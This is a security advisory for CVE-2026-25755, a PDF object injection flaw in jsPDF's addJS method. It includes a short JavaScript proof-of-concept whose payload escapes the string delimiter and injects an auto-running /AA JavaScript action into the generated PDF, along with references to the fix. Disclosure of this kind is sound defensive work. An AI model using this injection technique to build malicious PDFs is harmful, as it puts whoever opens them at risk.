CVE-2026-25755: jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method
User control of the argument of the addJS method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF.
import { jsPDF } from "jspdf";
const doc = new jsPDF();
// Payload:
// 1. ) closes the JS string.
// 2. > closes the current dictionary.
// 3. /AA ... injects an "Additional Action" that executes on focus/open.
const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";
doc.addJS(maliciousPayload);
doc.save("vulnerable.pdf");
References
- github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md
- github.com/advisories/GHSA-9vjf-qc39-jprp
- github.com/parallax/jsPDF
- github.com/parallax/jsPDF/commit/56b46d45b052346f5995b005a34af5dcdddd5437
- github.com/parallax/jsPDF/releases/tag/v4.2.0
- github.com/parallax/jsPDF/security/advisories/GHSA-9vjf-qc39-jprp
- nvd.nist.gov/vuln/detail/CVE-2026-25755
Code Behaviors & Features
Detect and mitigate CVE-2026-25755 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →